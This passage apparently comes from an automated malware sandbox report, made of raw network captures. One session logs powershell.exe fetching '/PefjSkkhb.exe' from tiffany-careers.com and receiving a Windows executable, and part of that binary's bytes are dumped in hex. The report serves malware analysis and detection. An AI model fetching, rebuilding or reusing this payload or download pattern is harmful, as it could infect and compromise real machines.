                                                                                                                                                                                                                  2024-12-18 20:06:10 UTC16384INData Raw: d5 87 4e 4b 98 ee 6d ee f7 6c 55 fe 1a d6 86 7b 3b cb 4d ad 1f cd 5e 76 b7 33 ae c6 f3 23 dd 5a 3a 5e ae d1 49 e5 c9 25 79 b5 68 3e 87 a1 1a 90 4b 53 a7 9a ca 26 f9 56 3f 96 a3 5b 35 f2 f7 54 30 ea 31 34 7f 34 9f 7a 8f b7 c5 14 9f 34 9f 2d 61 cb 38 f5 36 e6 8b 2e 59 c5 03 7c bf c5 fc 74 cb 84 54 8d b6 d6 5c 9a 84 5e 7e e8 df e5 7a 99 64 f3 7e 66 92 a3 de 2a 1b 59 10 c3 15 ca c9 b9 be ef f7 2b 4a 15 7f 23 74 8f f2 d5 39 9e 54 8f f7 3f 32 d3 ed 52 59 64 db fc 34 9c df 50 e5 77 19 35 a4 4f 27 98 b1 d3 2e 2c 15 23 dd e5 c7 b6 ac 49 6e f0 4f b9 64 dd b6 ae 34 9f 68 83 cb 68 e8 8d 6e b7 0f 64 72 d2 5b 2b c8 eb 54 da da 45 93 f7 92 7f 1e df b9 5d 85 9e 81 2c b3 24 8d 26 d5 6a b4 ba 1a af de f9 bf df ab 96 2d 47 72 5e 1e 6f 63 83 8f 74 52 6e 58 fe 6a ae d6 d7 37
                                                                                                                                                                                                                  Data Ascii: NKmlU{;M^v3#Z:^I%yh>KS&V?[5T0144z4-a86.Y|tT\^~zd~f*Y+J#t9T?2RYd4Pw5O'.,#InOd4hhndr[+TE],$&j-Gr^octRnXj7
                                                                                                                                                                                                                  2024-12-18 20:06:10 UTC16384INData Raw: 1f 99 5b ba 0e 87 f6 a9 f7 5c 3c 8a b5 0d bc 8a b2 22 c7 1d 6d da bc ab 1f cb 24 6a b5 cf 5e a4 92 d3 73 a2 9c 21 d7 73 43 4f d0 ac 6d e3 ff 00 57 f3 54 cd 65 a7 c0 ee cb 04 7f 35 66 4d ab ac 12 3a fd e5 ac ad 43 5a 94 a7 f7 6b 89 53 ab 29 6e 76 73 d3 84 6c 74 4c f6 d1 6c f2 53 e6 a1 75 48 d5 f6 f9 95 c7 c9 a8 ca bf 37 f1 54 0d 77 3b ff 00 bd 5b 2c 23 96 b2 30 fa c2 8e c7 6c ba ac 52 cf e5 ac 95 9b e2 8b 9d 9b 36 bd 73 11 de 4a b2 6e 5f 91 aa 49 af 1a 7f bd f3 55 c3 0a a3 2d 08 96 23 9c 4b e9 fc d9 36 ff 00 0d 54 c7 ef 3e 58 ea c2 85 6f f9 69 f3 54 98 94 ec 65 8f e5 ae ab a4 8e 59 3b b2 de 87 69 e6 c9 b9 a3 ad bb 82 bf 2e d8 f7 2a a6 da 66 87 61 fb 8d cd f7 9a b7 ac 6c a0 4f f6 ab 86 bd 6e 59 33 ba 8d 1b a3 02 38 65 69 3e 5b 7f f7 2b 4e d5 e5 5f bd 1f dd
                                                                                                                                                                                                                  Data Ascii: [\<"m$j^s!sCOmWTe5fM:CZkS)nvsltLlSuH7Tw;[,#0lR6sJn_IU-#K6T>XoiTeY;i.*falOnY38ei>[+N_
                                                                                                                                                                                                                  2024-12-18 20:06:10 UTC16384INData Raw: cf 4e 53 43 1f e2 a1 87 f1 55 08 55 91 bc ca 7c 66 99 8f e2 a7 2e df 2e 93 01 58 52 46 29 ad 4d 5f f5 9b a9 0d 16 61 3b aa cc 35 4e dd ff 00 ef 9a bd 0f fb 35 32 d8 45 8b 71 fd ea 72 8c 52 47 4e cd 66 50 bf 29 a7 46 7f 79 51 f4 a7 65 5b e5 a0 09 33 b7 e6 a7 46 6a bc 87 67 ca d4 91 c9 40 2d 0b 3b 7d aa 36 7a 6f 99 4d 6d bf 7a 80 7a b1 92 26 ef 9a 97 cb db 4b 9d d4 fa 01 ea 22 d2 c6 28 db 4e c7 ee e8 01 73 fb ca 7a fc d5 1c 7b 96 a4 5a 00 91 52 a4 51 fb ca 8e 13 56 21 0d ff 00 01 a0 a8 ec 49 0c 6b be a5 58 b7 52 a8 fe 15 a7 47 26 df 97 cb a0 a2 3f b2 ad 49 0d bf ef 3f d5 fc b5 66 3f 9a a5 8e 37 a9 03 3d ad ff 00 79 ba 8f b3 ab 7d e8 eb 41 a3 fd e5 2f 91 b7 fe 59 d0 05 35 b7 8b ef 53 9a 2d df 2b 47 56 d6 2d df 76 a5 68 36 c9 ba 80 33 fc 85 fe 2f bb 50 4d 6f
                                                                                                                                                                                                                  Data Ascii: NSCUU|f..XRF)M_a;5N52EqrRGNfP)FyQe[3Fjg@-;}6zoMmzz&K"(Nsz{ZRQV!IkXRG&?I?f?7=y}A/Y5S-+GV-vh63/PMo
                                                                                                                                                                                                                  2024-12-18 20:06:10 UTC16384INData Raw: 7a de ca bf ee b5 69 3c 1d c8 fa cd 8d 3d 69 ed a5 f9 97 e4 ff 00 72 a8 d8 dc 2a 49 e5 c9 f3 2d 54 b8 b9 95 be 55 a8 5a 5d 95 bd 3a 16 85 9b 32 75 a2 e5 7b 1b 77 52 ed f9 96 4d bf ec 3d 50 bc db 2d be e5 93 6b 54 52 5c f9 f0 25 43 27 f7 77 fc b5 54 a9 72 19 4a aa 7a 12 5b c6 a6 4f ef 54 57 47 f8 56 3a 96 de 4d 8f 4d 9a 45 69 eb 78 de ee e6 7a 2d 88 95 3f bd 4a cf 49 21 fe f7 dd a1 be 5a a3 3d 7a 0e dd b6 3f 94 d1 19 96 4f 95 68 fb df ec d2 30 db fc 7b 6a 83 df 0f f6 64 a1 76 b7 de 7a 55 f9 69 7c ba 03 41 b8 fe ef dd a5 54 6a 55 1b 3e 5f e2 a4 ce da 00 46 0a bf 33 51 bb 77 dd a9 19 ff 00 87 cb a6 61 7f 86 82 18 65 29 3f 8e 97 1f c4 d1 ee a5 60 ad 26 ea 0a e8 2b 7c d1 ee a6 c8 29 e5 5b f8 69 b5 51 24 6e 37 53 8a 6d a5 c5 22 9f ef 51 2d cb 8e c3 aa 2d 9b 24
                                                                                                                                                                                                                  Data Ascii: zi<=ir*I-TUZ]:2u{wRM=P-kTR\%C'wTrJz[OTWGV:MMEixz-?JI!Z=z?Oh0{jdvzUi|ATjU>_F3Qwae)?`&+|)[iQ$n7Sm"Q--$
                                                                                                                                                                                                                  2024-12-18 20:06:10 UTC16069INData Raw: 44 91 bd 63 ea 5a 73 41 23 b7 f0 d7 5d 3c 44 5b dc e4 a9 86 92 5a 19 7f 67 95 67 f9 be ed 42 d2 37 99 ba ae 49 23 0a a7 71 f3 49 b9 ab b6 2e fe 87 14 d7 2a 1b bd 64 93 e5 fb b5 23 1f de 53 58 28 f9 96 9d 1b ee f9 9b ee d6 ca dd 0e 69 5e ca e3 7c dd b4 d6 3b a3 dd fd ea 77 de df 4c c2 a4 7b 69 85 fc 87 af fb 54 dd df bc db 4b b1 7e f4 94 99 fe ed 01 7b 8f 8e 3f ee d2 aa 6d a5 8c b0 8f e6 a4 6f 9a 37 a0 91 9b 59 a4 f9 7e 5a 5f f6 9a 9c a7 6c 7b 5a 8c 7f 0b 54 dd 9a 38 ab 09 0f ef 2a c4 96 ab e5 ee a8 76 ed fb b5 66 d5 d1 23 f9 a4 f9 aa 6a 49 a5 a1 54 ec f4 2a e1 5a 95 4f f0 d4 b7 1f 37 cd 1d 45 b3 7c 7f 35 17 b9 32 f7 5e 84 b6 f2 b2 fd da 5f b5 cb f7 5a a1 54 55 a9 61 b7 63 1f 98 b5 12 4a fa 9a 46 53 7b 0a b2 b7 99 ba 9a cf b6 4d b4 f5 b7 66 f9 9a a5 5b 4d
                                                                                                                                                                                                                  Data Ascii: DcZsA#]<D[ZggB7I#qI.*d#SX(i^|;wL{iTK~{?mo7Y~Z_l{ZT8*vf#jIT*ZO7E|52^_ZTUacJFS{Mf[M
                                                                                                                                                                                                                  2024-12-18 20:06:10 UTC16384INData Raw: ad 23 5a b4 74 33 95 3a 53 67 36 ba 24 70 49 f2 c7 48 da 5e ef 99 63 f9 ab a6 8e 7b 16 8f e6 92 3d d4 92 35 b0 f9 9b ee d5 fd 62 a7 54 43 a3 4d 1c b5 f5 bc f1 41 b5 a0 ac 96 8d bf 8a 3f 9a bb 6b 8b dd 37 fd 5b 49 54 2f 24 d3 3f e7 a4 75 b5 3c 44 91 8d 4a 30 b6 87 37 22 37 c9 22 d4 da 7e 99 7d 7f 26 db 78 e4 f9 6b a7 d2 6c ac 75 1d fe 5f dd 5f e0 ae bb c3 76 76 d6 bb 1b cb 8f 75 15 31 ae 3a 05 2c 27 35 92 d8 f2 bf ec bd 4d 67 f2 e6 82 74 6a de f0 fe 89 2a 6c f3 be 5a f5 0b 8b 48 25 f9 bc b8 f7 2a 57 31 a8 4c a9 3f fc 0e b9 67 8d 95 48 e8 b5 3a 63 83 50 64 31 d8 79 12 6e 8e 49 36 d5 8f 37 3f 7a 4f 9a 9b 1c ed e5 fc d2 7c b4 c9 8a f9 9e 65 71 bf 79 dd 9d 51 56 26 8e 6d b4 f5 9b 7c 9b 5b ee d5 05 9e 86 97 6c 75 3c a8 77 2f 4d b7 ef 2d 79 9f ed 9d a8 b5 9f ec
                                                                                                                                                                                                                  Data Ascii: #Zt3:Sg6$pIH^c{=5bTCMA?k7[IT/$?u<DJ07"7"~}&xklu__vvu1:,'5Mgtj*lZH%*W1L?gH:cPd1ynI67?zO|eqyQV&m|[lu<w/M-y
                                                                                                                                                                                                                  2024-12-18 20:06:10 UTC16384INData Raw: cb bb 9f 9a bc fa 95 5a d8 e9 84 6e cf d0 8d 3f e2 bf c3 9b fb a7 b7 ff 00 84 c2 c6 2d b3 32 fc ff 00 77 85 fe 13 fd da e7 b5 0f da 1f e1 15 85 f4 d6 eb ae dd 5d 32 ee de f6 f6 ad b7 8f 7a f8 63 4d b8 97 ec 29 1c 97 7b 55 3f 83 fb f4 9a a6 a9 3d ac ea b6 f6 90 45 e6 fc ae ef f3 7d 2b 08 e2 ea 39 38 dc bf 62 92 b9 ef fe 22 fd a8 3c 47 aa 78 d3 fb 53 4f d2 63 b5 b7 d2 e6 55 b1 b7 f3 db ca 75 19 f9 e4 4f e2 dd 57 3e 39 7e d2 52 78 87 e1 0c 36 3e 1f 82 4d 2f 5e b8 bb 55 d5 1e 1f 95 76 f5 cc 7d c6 6b e6 ed 3c df 5c 47 35 f4 69 b5 57 f8 3f 8b ff 00 d5 4e d5 b5 14 9e d5 a6 b8 f2 d5 57 fb 9f c6 c2 b9 9c ea fb 5b dc 6a 37 47 ab 7c 37 f8 e7 e3 6f 07 ea b6 f0 c9 7f 3d e6 8f e7 2c f7 d6 f3 7e f5 9f 3f 78 6e 3f 76 bb 4f 8a 5f b4 b6 a1 ae f8 82 5d 1f c1 f6 3f 63 d3 65
                                                                                                                                                                                                                  Data Ascii: Zn?-2w]2zcM){U?=E}+98b"<GxSOcUuOW>9~Rx6>M/^Uv}k<\G5iW?NW[j7G|7o=,~?xn?vO_]?ce


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  7192.168.2.649741147.45.49.155443612C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  2024-12-18 20:06:10 UTC82OUTGET /PefjSkkhb.exe HTTP/1.1
                                                                                                                                                                                                                  Host: tiffany-careers.com
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  2024-12-18 20:06:10 UTC439INHTTP/1.1 200 OK
                                                                                                                                                                                                                  etag: "108a00-675eb102-2534d;;;"
                                                                                                                                                                                                                  last-modified: Sun, 15 Dec 2024 10:35:46 GMT
                                                                                                                                                                                                                  content-type: application/x-executable
                                                                                                                                                                                                                  content-length: 1083904
                                                                                                                                                                                                                  accept-ranges: bytes
                                                                                                                                                                                                                  date: Wed, 18 Dec 2024 20:06:10 GMT
                                                                                                                                                                                                                  server: LiteSpeed
                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                                                                                                  connection: close
                                                                                                                                                                                                                  2024-12-18 20:06:10 UTC16384INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6f 31 29 eb 2b 50 47 b8 2b 50 47 b8 2b 50 47 b8 9f cc b6 b8 3e 50 47 b8 9f cc b4 b8 b7 50 47 b8 9f cc b5 b8 0a 50 47 b8 b5 f0 80 b8 2a 50 47 b8 79 38 42 b9 05 50 47 b8 79 38 43 b9 3a 50 47 b8 79 38 44 b9 23 50 47 b8 22 28 c4 b8 23 50 47 b8 22 28 c0 b8 2a 50 47 b8 22 28 d4 b8 0e 50 47 b8 2b 50 46 b8 06 52 47 b8 8e 39 49 b9 7b 50 47 b8 8e 39 44 b9 2a 50 47 b8 8e 39 b8 b8 2a 50 47
                                                                                                                                                                                                                  Data Ascii: MZ@0!L!This program cannot be run in DOS mode.$o1)+PG+PG+PG>PGPGPG*PGy8BPGy8C:PGy8D#PG"(#PG"(*PG"(PG+PFRG9I{PG9D*PG9*PG
                                                                                                                                                                                                                  2024-12-18 20:06:10 UTC16384INData Raw: c0 48 8d 45 20 48 8b d6 4c 8d 45 28 48 89 44 24 20 e8 5e f5 ff ff 85 c0 0f 88 96 70 04 00 48 8d 4d c0 e8 55 54 00 00 44 8b 45 20 e9 00 ff ff ff 48 8d 0d f9 ba 0e 00 e8 5c 09 00 00 33 c0 4c 8d 5c 24 70 49 8b 5b 30 49 8b 73 38 49 8b e3 41 5f 41 5e 5d c3 48 89 5c 24 08 48 89 7c 24 10 55 48 8b ec 48 83 ec 70 41 8b 18 45 33 db ff cb 44 89 5d c8 4c 8b d1 89 5d b4 49 8b f8 4c 89 5d d0 c7 45 d8 01 00 00 00 41 8b cb 44 89 5d e0 45 8a cb 4c 89 5d e8 c7 45 f0 01 00 00 00 c7 45 b0 02 00 00 00 44 8b 07 41 8b d0 41 8d 40 01 89 07 e8 75 06 00 00 48 85 c0 74 2c 45 84 c9 75 27 48 8b 40 08 48 8b 10 66 44 39 5a 08 75 d7 8b 12 83 ea 0b 74 4f 83 fa 01 75 cb 85 c9 75 42 44 8a ca 44 89 45 b8 eb be 49 8d 8a 68 02 00 00 48 8d 55 b0 e8 98 07 00 00 8d 43 01 48 8d 4d e0 89 07 e8 de
                                                                                                                                                                                                                  Data Ascii: HE HLE(HD$ ^pHMUTDE H\3L\$pI[0Is8IA_A^]H\$H|$UHHpAE3D]L]IL]EAD]EL]EEDAA@uHt,Eu'H@HfD9ZutOuuBDDEIhHUCHM
                                                                                                                                                                                                                  2024-12-18 20:06:11 UTC16384INData Raw: 84 24 88 00 00 00 89 74 24 50 4d 8b c5 48 89 44 24 48 8b d7 8b 84 24 18 01 00 00 89 44 24 40 8b 84 24 20 01 00 00 89 44 24 38 8b 44 24 60 89 5c 24 30 44 89 74 24 28 89 44 24 20 e8 5c 00 00 00 48 8b b4 24 28 01 00 00 8b d8 48 8b ce e8 8e 87 00 00 48 8b ce c7 46 10 01 00 00 00 89 1e e8 59 73 00 00 85 c0 0f 84 71 49 04 00 83 ff 1d 74 08 49 8b cd e8 ac bf 01 00 45 33 f6 48 8d 4c 24 70 e8 5b 87 00 00 41 8b c6 48 81 c4 c8 00 00 00 41 5f 41 5e 41 5d 41 5c 5f 5e 5d 5b c3 48 8b c4 48 89 58 20 4c 89 40 18 48 89 48 08 55 56 57 41 54 41 55 41 56 41 57 48 8d 68 c1 48 81 ec 90 00 00 00 8b 3d e1 80 0e 00 45 33 ed 41 8b d9 44 8b fa 83 fa 0c 0f 84 33 49 04 00 83 fa 0d 7e 1b 83 fa 0f 0f 8e 25 49 04 00 83 fa 11 0f 84 1c 49 04 00 83 fa 14 0f 84 13 49 04 00 83 ff ff 0f 84 36
                                                                                                                                                                                                                  Data Ascii: $t$PMHD$H$D$@$ D$8D$`\$0Dt$(D$ \H$(HHFYsqItIE3HL$p[AHA_A^A]A\_^][HHX L@HHUVWATAUAVAWHhH=E3AD3I~%III6
                                                                                                                                                                                                                  2024-12-18 20:06:11 UTC16384INData Raw: c1 89 83 c8 00 00 00 3b 53 1c 0f 8d e6 42 04 00 4c 63 9d 58 01 00 00 41 3b d3 0f 8f eb 42 04 00 8b 43 18 48 8b 7b 10 41 2b c1 49 63 d0 8b 04 87 89 04 97 41 8d 40 01 48 8b 7c 24 48 49 8b d7 48 2b 93 98 00 00 00 48 d1 fa 48 63 c8 48 8b 43 10 89 14 88 8b 95 48 01 00 00 45 3b d8 0f 8f 8e fb ff ff 45 8d 58 02 44 89 9d 58 01 00 00 e9 7e fb ff ff 83 ff 10 0f 85 39 03 00 00 8b 95 48 01 00 00 49 83 c6 06 e9 af fa ff ff 49 83 c6 02 83 c7 ab 49 8b ce 40 f6 c7 01 74 06 41 bd 01 00 00 00 46 0f be 9c 1f f8 80 0c 00 8b c7 48 8d 3d 4e 33 ff ff 44 89 5c 24 58 44 0f be 94 38 e8 80 0c 00 44 89 54 24 50 45 85 d2 75 0c b8 ff ff ff 7f 44 8b d0 89 44 24 50 bf 01 00 00 00 45 0f b7 0e 4c 8d 71 02 44 89 4c 24 54 41 8d 41 f1 83 f8 01 0f 86 da 6d 04 00 48 c7 c0 ff ff ff ff 8b c8 89
                                                                                                                                                                                                                  Data Ascii: ;SBLcXA;BCH{A+IcA@H|$HIH+HHcHCHE;EXDX~9HIII@tAFH=N3D\$XD8DT$PEuDD$PELqDL$TAAmH
                                                                                                                                                                                                                  2024-12-18 20:06:11 UTC16384INData Raw: 00 00 49 8b 0c df 49 8b d5 e8 16 40 01 00 49 89 3c df 48 ff c3 49 3b de 72 e8 4c 8b 6c 24 48 e9 cf fa ff ff 4c 8d 3d d5 f3 fe ff 49 8b 5c fd 00 48 85 db 74 61 48 8b 73 08 48 85 f6 74 36 48 8b 46 18 ff 08 48 8b 46 18 44 39 30 75 16 48 8b 0e e8 cf 3f 01 00 48 8b 4e 18 ba 04 00 00 00 e8 c1 3f 01 00 ba 20 00 00 00 48 8b ce e8 b4 3f 01 00 4c 89 73 08 8b 43 10 83 f8 05 0f 8d f6 00 00 00 b8 01 00 00 00 44 89 33 48 8b cb 89 43 10 8d 50 17 e8 8e 3f 01 00 4d 89 74 fd 00 48 ff c7 49 3b fc 72 88 e9 62 fa ff ff 44 8b 5c 24 40 45 33 c0 48 8b 9d a8 00 00 00 e9 ac f6 ff ff 41 83 e9 01 0f 88 dd fa ff ff 41 ff c2 41 ff c0 e9 a0 fa ff ff 48 8b 9d b0 00 00 00 48 8b cb c6 00 00 e8 fd 06 00 00 49 8b c7 89 43 10 33 c0 89 03 e9 93 f8 ff ff 49 8b 0a 48 8b 17 48 85 c0 74 20 44 0f
                                                                                                                                                                                                                  Data Ascii: II@I<HI;rLl$HL=I\HtaHsHt6HFHFD90uH?HN? H?LsCD3HCP?MtHI;rbD\$@E3HAAAHHIC3IHHt D
                                                                                                                                                                                                                  2024-12-18 20:06:11 UTC16384INData Raw: e8 db c7 ff ff 48 8d 15 94 9e 0d 00 49 8b cc e8 dc 05 00 00 c6 44 24 51 00 e9 86 fd ff ff 80 7c 24 51 00 0f 85 89 aa 04 00 49 8b dc e9 93 fd ff ff 44 8b 6c 24 40 4c 8b 64 24 48 4c 8b 74 24 38 4c 89 64 24 58 4c 89 b5 88 00 00 00 45 85 ed 0f 84 c6 b6 04 00 41 83 fd 01 0f 85 d0 b6 04 00 49 8b d6 48 8d 4d 90 48 c7 45 98 00 00 00 00 e8 7d 05 00 00 48 8d 4d 90 e8 3c fe fe ff 84 c0 0f 85 75 02 00 00 83 fb 07 75 62 48 8b 55 78 4d 8b c7 e8 9b 94 00 00 85 c0 0f 88 f3 b8 04 00 83 fb 08 0f 84 a2 b6 04 00 41 83 fd 01 0f 85 b5 b6 04 00 49 8b de 48 8b cb e8 25 c7 ff ff c6 03 00 80 7c 24 34 00 c7 43 10 09 00 00 00 0f 85 ae b6 04 00 80 7d 88 00 0f 84 c6 b6 04 00 b0 01 48 ff cf 88 45 89 48 89 7c 24 78 88 44 24 34 48 8d 4d 90 e8 ec c6 ff ff 48 8b 7d 78 e9 fe ef ff ff 83 f8
                                                                                                                                                                                                                  Data Ascii: HID$Q|$QIDl$@Ld$HLt$8Ld$XLEAIHMHE}HM<uubHUxMAIH%|$4C}HEH|$xD$4HMH}x
                                                                                                                                                                                                                  2024-12-18 20:06:11 UTC16384INData Raw: 8d 05 6a eb 06 00 48 89 45 f0 48 8d 05 5f fb 09 00 48 89 05 d8 2f 0d 00 48 8d 05 41 ec 06 00 48 c7 45 f8 00 00 00 00 0f 11 05 7a 2f 0d 00 c7 05 5c 2f 0d 00 01 00 00 00 0f 10 45 f0 48 89 45 f0 48 8d 05 d1 04 0a 00 48 89 05 ca 2f 0d 00 48 8d 05 4b f0 06 00 48 c7 45 f8 00 00 00 00 0f 29 05 6c 2f 0d 00 0f 10 45 f0 48 89 45 f0 48 8d 05 f5 05 0a 00 48 89 05 c6 2f 0d 00 48 8d 05 c7 f1 06 00 48 c7 45 f8 00 00 00 00 0f 11 05 68 2f 0d 00 66 c7 05 ff 2e 0d 00 00 00 0f 10 45 f0 48 89 45 f0 48 8d 05 b8 ef 09 00 48 89 05 b9 2f 0d 00 48 8d 05 fe f3 06 00 48 c7 45 f8 00 00 00 00 0f 29 05 5b 2f 0d 00 0f 10 45 f0 48 89 45 f0 48 8d 05 f4 05 0a 00 48 c7 45 f8 00 00 00 00 0f 11 05 65 2f 0d 00 48 89 05 a6 2f 0d 00 48 8d 05 bb 5a 00 00 0f 10 45 f0 48 89 45 f0 48 8d 05 a0 f7 09
                                                                                                                                                                                                                  Data Ascii: jHEH_H/HAHEz/\/EHEHH/HKHE)l/EHEHH/HHEh/f.EHEHH/HHE)[/EHEHHEe/H/HZEHEH
                                                                                                                                                                                                                  2024-12-18 20:06:11 UTC16384INData Raw: 00 c7 05 89 12 0d 00 02 00 00 00 66 c7 05 84 12 0d 00 00 00 c7 05 9a 12 0d 00 02 00 00 00 c7 05 94 12 0d 00 02 00 00 00 66 c7 05 8f 12 0d 00 00 00 c7 05 a5 12 0d 00 02 00 00 00 c7 05 9f 12 0d 00 03 00 00 00 66 c7 05 9a 12 0d 00 00 00 c7 05 b0 12 0d 00 01 00 00 00 c7 05 aa 12 0d 00 01 00 00 00 66 c7 05 a5 12 0d 00 00 00 48 89 05 a6 12 0d 00 48 c7 45 f8 00 00 00 00 48 8d 05 73 6a 08 00 48 89 45 f0 48 8d 05 d4 a4 09 00 0f 10 45 f0 48 89 05 a9 12 0d 00 48 8d 05 72 6c 08 00 48 89 45 f0 48 8d 05 17 b0 09 00 48 89 05 b8 12 0d 00 48 8d 05 99 6e 08 00 48 c7 45 f8 00 00 00 00 0f 29 05 5a 12 0d 00 0f 10 45 f0 48 89 45 f0 48 8d 05 8b b1 09 00 48 89 05 b4 12 0d 00 48 8d 05 81 ab fe ff 48 c7 45 f8 00 00 00 00 0f 11 05 56 12 0d 00 c7 05 34 12 0d 00 02 00 00 00 0f 10 45
                                                                                                                                                                                                                  Data Ascii: ffffHHEHsjHEHEHHrlHEHHHnHE)ZEHEHHHHEV4E
                                                                                                                                                                                                                  2024-12-18 20:06:11 UTC16384INData Raw: 45 33 ff 48 8b 55 88 44 8b 4d a8 66 89 42 04 4c 8b 55 80 bb 52 00 00 00 4c 8b 85 a0 01 00 00 41 8b 88 88 00 00 00 8d 41 01 41 89 80 88 00 00 00 81 f9 fa 00 00 00 0f 8d dc 6b 04 00 b8 80 00 00 00 4d 8b d0 44 3b e8 0f 86 c5 54 04 00 49 8b 42 40 49 2b 42 20 48 d1 f8 48 89 45 18 48 89 55 c8 4c 8b b5 a8 01 00 00 41 8b cf 66 44 89 2a 45 8b c7 41 8b ba 98 00 00 00 49 8b c6 41 8b 5a 70 48 f7 d8 48 89 55 00 48 8d 45 10 48 1b d2 44 89 7d 10 48 23 d0 b8 87 00 00 00 48 89 54 24 70 44 3b e8 4c 89 54 24 68 41 8d 45 81 0f 94 c1 48 8d 55 00 41 3b c3 8b 85 98 01 00 00 41 0f 96 c0 03 c1 48 8b 8d 90 01 00 00 48 89 4c 24 60 48 8d 4d 38 48 89 4c 24 58 48 8d 4d 54 48 89 4c 24 50 48 8d 4d 50 48 89 4c 24 48 48 8d 8d 8c 00 00 00 48 89 4c 24 40 41 8b cc 89 44 24 38 89 74 24 30 48
                                                                                                                                                                                                                  Data Ascii: E3HUDMfBLURLAAAkMD;TIB@I+B HHEHULAfD*EAIAZpHHUHEHD}H#HT$pD;LT$hAEHUA;AHHL$`HM8HL$XHMTHL$PHMPHL$HHHL$@AD$8t$0H
                                                                                                                                                                                                                  2024-12-18 20:06:11 UTC16384INData Raw: 22 11 ff d0 48 83 c4 20 4c 8b 65 c0 4c 8b 6d c8 4c 8b 75 d0 4c 8b 7d d8 48 8b 5d e0 48 8b e5 5d c3 cc cc cc e9 8b 85 fe ff cc cc cc 40 53 48 83 ec 20 48 8b d9 eb 0f 48 8b cb e8 1d 46 00 00 85 c0 74 13 48 8b cb e8 5d 01 01 00 48 85 c0 74 e7 48 83 c4 20 5b c3 48 83 fb ff 74 06 e8 9f 09 00 00 cc e8 b9 09 00 00 cc e9 bf ff ff ff cc cc cc 48 83 ec 28 e8 57 0b 00 00 85 c0 74 21 65 48 8b 04 25 30 00 00 00 48 8b 48 08 eb 05 48 3b c8 74 14 33 c0 f0 48 0f b1 0d 9c a2 0c 00 75 ee 32 c0 48 83 c4 28 c3 b0 01 eb f7 cc cc cc 40 53 48 83 ec 20 0f b6 05 87 a2 0c 00 85 c9 bb 01 00 00 00 0f 44 c3 88 05 77 a2 0c 00 e8 86 09 00 00 e8 19 19 00 00 84 c0 75 04 32 c0 eb 14 e8 a4 5f 01 00 84 c0 75 09 33 c9 e8 35 19 00 00 eb ea 8a c3 48 83 c4 20 5b c3 cc cc cc 40 53 48 83 ec 40 80
                                                                                                                                                                                                                  Data Ascii: "H LeLmLuL}H]H]@SH HHFtH]HtH [HtH(Wt!eH%0HHH;t3Hu2H(@SH Dwu2_u35H [@SH@


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                  8192.168.2.64975420.198.118.190443
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  2024-12-18 20:06:14 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 67 4e 30 72 57 72 7a 59 51 30 6d 61 41 6c 35 66 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 31 34 33 65 64 66 33 31 34 64 31 30 62 39 35 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: CNT 1 CON 305MS-CV: gN0rWrzYQ0maAl5f.1Context: c143edf314d10b95
                                                                                                                                                                                                                  2024-12-18 20:06:14 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                  Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
